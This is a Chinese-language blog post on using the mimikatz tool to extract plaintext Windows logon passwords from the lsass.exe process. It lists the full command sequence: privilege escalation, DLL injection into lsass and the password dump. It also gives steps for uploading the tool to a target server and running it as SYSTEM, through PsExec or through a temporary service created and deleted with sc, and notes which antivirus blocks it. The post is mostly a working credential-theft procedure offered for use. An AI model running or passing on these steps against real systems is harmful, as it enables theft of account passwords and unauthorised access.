也看mimikatz直接抓windows系统密码

mimikat是一个法国人写的轻量级调试器,网上流传的一直很邪乎,有人称之为神器。该工具准确的说是具有一系统的功能的。其中最让我们这些脚本小子最看中的莫过于能直接从 lsass.exe 里获取windows处于active状态账号明文密码。

下面我是以自己的xp系统为例,做的抓取的实验,具体步骤如下:
//开始运行
mimikatz
//提升权限
privilege::debug
//注入dll
inject::process lsass.exe sekurlsa.dll
//抓取密码
@getLogonPasswords
 



<a href="https://www.361way.com/wp-content/uploads/2012/07/mimikat.jpg"><img class="alignleft size-full wp-image-1648" title="mimikat" alt="" src="https://www.361way.com/wp-content/uploads/2012/07/mimikat.jpg" width="508" height="320" /></a>
其中红色划掉的部分就是取得的明文密码。



其目前支持主流的所有windows系统,其支持的系统如下:
Windows XP
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1
&nbsp;当然以上系统64位的也不在话下,具体原理是因为lsass进程中,明文密码经过加密算法的密文可逆的。



在远程终端中抓取密码的方法也大同小异。

首先提取几个文件,只抓取密码的话,只需要这几个文件:

mimikatz_trunktoolsPsExec.exe
mimikatz_trunkWin32mimikatz.exe
mimikatz_trunkWin32sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

破解方法使用下面两种任一种都可以:
//最简单实用的方法,使用 PsExec.exe 启动。
//在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
psexec -s cmd.exe
//启动 mimikatz.exe
C:mimikatz_trunkWin32mimikatz.exe
//提升权限
privilege::debug
//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
inject::process lsass.exe "C:mimikatz_trunkWin32sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit
第二种方法,服务启动法:
sc create getpassword binpath= "cmd.exe /c c:xxxmimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword
&nbsp;不过,这货虽然强大,但在开启有主动防御的杀毒软件面前也无能为力。比如说最常见的360。因为360会保护进程lsass进程。所以上面的dll注入会拒绝。



该工具包的下载地址:<a href="http://blog.gentilkiwi.com/mimikatz">http://blog.gentilkiwi.com/mimikatz</a>



另外的一些用法,作者的博客上也有介绍。



&nbsp;

也看mimikatz直接抓windows系统密码》有1条评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注